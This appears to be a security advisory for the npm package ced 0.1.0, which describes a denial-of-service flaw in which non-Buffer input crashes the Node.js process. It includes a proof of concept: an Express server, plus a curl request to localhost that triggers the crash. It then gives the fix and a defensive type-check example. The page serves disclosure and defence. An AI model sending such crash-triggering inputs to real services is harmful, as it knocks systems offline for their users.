ced@0.1.0 vulnerabilities

Detect the character encoding using Google’s compact_enc_det library

Direct Vulnerabilities

Known vulnerabilities in the ced package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability Vulnerable Version
  • H
Denial of Service (DoS)

ced is a package that detects the character encoding using Google’s compact_enc_det library.

Affected versions of this package are vulnerable to Denial of Service (DoS). Passing data types other than Buffer causes the Node.js process to crash.

PoC

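const express = require("express");
const bodyParser = require("body-parser");
const ced = require("ced");

const app = express();

// raw() only turns bodies of its configured content type
// (application/octet-stream by default) into a Buffer.
app.use(bodyParser.raw());

app.post("/", (req, res) => {
  // For the text/plain request below, req.body is not a Buffer,
  // so ced receives an unsupported type and the process crashes.
  const encoding = ced(req.body);

  res.end(encoding);
});

app.listen(3000);

curl --request POST --header "Content-Type: text/plain" --data foo http://localhost:3000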

How to fix Denial of Service (DoS)?

Upgrade ced to version 1.0.0 or higher.
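
In addition to upgrading, a handler like the one in the PoC can reject non-Buffer bodies before the detector is ever called. The following is an added example, not code from this advisory or from the ced project; `detectEncoding` and `stubDetect` are hypothetical names, and the detector is injected so the sketch runs without ced installed.

```javascript
// Added example: type guard that runs before the encoding detector is called.
// In a real handler, `detect` would be require("ced") (assumption).

// Constructed stand-in for the detector. Like the affected versions, it cannot
// cope with anything but a Buffer; here that is a throw rather than a crash.
function stubDetect(buf) {
  if (!Buffer.isBuffer(buf)) throw new TypeError("detector got a non-Buffer");
  const hasBom = buf.length >= 3 &&
    buf[0] === 0xef && buf[1] === 0xbb && buf[2] === 0xbf;
  return hasBom ? "UTF-8 (BOM)" : "unknown"; // constructed labels
}

// Returns { status, body } so an Express handler can call
// res.status(r.status).end(r.body).
function detectEncoding(body, detect) {
  // With bodyParser.raw(), a request whose Content-Type does not match the
  // parser's type leaves req.body as a non-Buffer value. That is the input
  // the PoC's curl command produces.
  if (!Buffer.isBuffer(body)) {
    return { status: 415, body: "expected a raw binary body" };
  }
  if (body.length === 0) {
    return { status: 400, body: "empty body" };
  }
  return { status: 200, body: detect(body) };
}

// Constructed sample inputs.
const samples = [
  Buffer.from("foo"),                  // well-formed raw body
  {},                                  // body the middleware did not parse
  "foo",                               // string from a text parser
  new Uint8Array([0x66, 0x6f, 0x6f]),  // typed array that is not a Buffer
  Buffer.alloc(0),                     // empty body
];
for (const sample of samples) {
  console.log(detectEncoding(sample, stubDetect));
}
```
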

Vulnerable versions: <1.0.0